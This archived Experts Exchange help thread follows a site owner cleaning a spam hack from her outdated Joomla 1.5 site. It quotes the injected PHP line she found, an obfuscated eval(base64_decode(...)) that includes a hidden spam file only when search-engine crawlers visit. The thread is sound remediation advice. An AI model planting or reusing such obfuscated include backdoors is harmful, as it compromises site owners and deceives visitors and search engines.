Solved

I have a site that has got viagra and other spam stuff all through their site on google.

Posted on 2014-09-03
7
186 Views
Last Modified: 2014-09-18
Hi,
On my site here http://simmental.com.au you will notice that if you google search it, there are spam words through out the site.
How do I clean this site up and get rid of the garbage?
Thank you
0
Comment
Question by:Amanda Watson
  • 3
  • 3
7 Comments
 
LVL 58

Assisted Solution

by:Gary
Gary earned 100 total points
Comment Utility
Is this a CMS?
Can you give some example pages where the spam is?

Obviously someone has hacked the site and you need to check all your files for funny things like base64 encoded code
Change all your passwords - ftp etc - immediately
0
 
LVL 11

Author Comment

by:Amanda Watson
Comment Utility
Thanks,  changing passwords etc is obvious now!, but how can I fix whats is there.....do all files have to be tested?
0
 
LVL 58

Expert Comment

by:Gary
Comment Utility
Yes, unless you have a backup you can upload.
0
Maximize Your Threat Intelligence Reporting

Reporting is one of the most important and least talked about aspects of a world-class threat intelligence program. Here’s how to do it right.

 
LVL 11

Author Comment

by:Amanda Watson
Comment Utility
I found this on the index page
<?php @eval(base64_decode("aWYgKEBwcmVnX21hdGNoICgiL1tHZ11bT29dW09vXVtHZ11bTGxdW0VlXXxbTGxdW0lpXVtWdl1bRWVdfFtNbV1bU3NdW05uXXxbWXldW0FhXVtIaF1bT29dW09vXXxbQWFdW1NzXVtLa118W0FhXVtPb11bTGxdfFtCYl1bT29dW1R0XS8iLCRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXSkpIHsKCWlmIChAaXNfZmlsZSgiLi9pbWFnZXMvc3Rvcmllcy9saXN0LnR4dCIpKSB7CgkJQGluY2x1ZGUgIi4vaW1hZ2VzL3N0b3JpZXMvbGlzdC50eHQiOwoJfQp9Cg==")); ?>


Could that be the only area or cultprit?
A
0
 
LVL 58

Expert Comment

by:Gary
Comment Utility
Usually its one or 2 files, if you remove it is it fixed
0
 
LVL 16

Accepted Solution

by:
Lucas Bishop earned 400 total points
Comment Utility
In viewing the source code of your site, I see you're using Joomla 1.5 as your CMS.  The version you are using reached end of life in Sep 2012. See the announcement here: http://docs.joomla.org/Joomla_1.5_version_history

You can remove any malicious scripts you find in the source code of your site, but odds are, there are a variety of security holes in your CMS. Hence, if you remove the malicious files today, they'll probably be inserted again shortly thereafter.  You can search google for "joomla 1.5 exploit" and find a slew of potential culprits that can effect your current setup.

Finally, I decoded the script you posted above and the following file is being referenced in it, from your server... I'd delete this: http://simmental.com.au/images/stories/list.txt
0
 
LVL 11

Author Closing Comment

by:Amanda Watson
Comment Utility
Well advised
0

Featured Post

Better Security Awareness With Threat Intelligence

See how one of the leading financial services organizations uses Recorded Future as part of a holistic threat intelligence program to promote security awareness and proactively and efficiently identify threats.

Join & Write a Comment

Every business owner understands the significance of online customer reviews and the impact it can have on sales and revenues. With technology advancing at such a rapid pace, getting online reviews has never been easier, especially when many regions…
Boost your ability to deliver ambitious and competitive web apps by choosing the right JavaScript framework to best suit your project’s needs.
An overview of how to create reports in Adobe Analytics (formerly Omniture Site Catalyst) using pageNames, events, eVars and props. This video will show you how to install the Omniture Debugger tool so can see (and test) what is being passed int…
Learn how to set-up custom confirmation messages to users who complete your Wufoo form. Include inputs from fields in your form, webpage redirects, and more with Wufoo’s confirmation options.

763 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question

Need Help in Real-Time?

Connect with top rated Experts

11 Experts available now in Live!

Get 1:1 Help Now